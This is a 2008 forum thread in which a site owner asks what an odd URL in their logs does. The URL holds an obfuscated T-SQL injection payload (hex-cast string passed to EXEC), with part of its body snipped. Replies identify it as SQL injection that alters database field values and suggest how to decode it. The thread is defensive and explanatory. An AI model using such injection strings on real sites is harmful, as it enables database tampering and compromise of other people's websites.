SitePoint Sponsor |
|
User Tag List
Results 1 to 4 of 4
-
Sep 22, 2008, 12:41 #1
What does this URL attempt to do?
What exactly is someone attempting by accessing this url on my site?
Code:/?;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434 <snipped about 1200 chars> 736F72 AS CHAR(4000));EXEC(@S);
~
-
Sep 22, 2008, 15:16 #2
- Join Date
- Jul 2005
- Location
- West Springfield, Massachusetts
- Posts
- 17,290
- Mentioned
- 198 Post(s)
- Tagged
- 3 Thread(s)
I'm sure the answer is in the "snipped about 1200 chars".
I'm also sure the code is obfuscated. To see what it "tranlates" to, if you're willing to take the chance (carefully weigh the risk against your curiosity), run the code without the exec(). Instead try changing that to echo(@s) - PHP, or document.write(@s) - javascript.Big Change Coming Soon - if you want your PMs save them now!
What you need to do to prepare for our migration to Discourse
A New SitePoint Forum Experience: Our Move to Discourse
-
Sep 22, 2008, 15:16 #3
- Join Date
- Dec 2007
- Posts
- 358
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
This may be successful when your site has SQL injection. For example, when it queries database for content which corresponds current URL and the URL is not escaped then you may have SQL injection.
-
Sep 23, 2008, 09:07 #4
- Join Date
- Mar 2003
- Location
- In tha fruit cellar
- Posts
- 1,379
- Mentioned
- 32 Post(s)
- Tagged
- 1 Thread(s)
yep it looks like a SQL injection attack. by appending the string to a url request they can be able to modify the field values of your database table to include the following string
Who's to doom when the judge himself is dragged before the bar
Bookmarks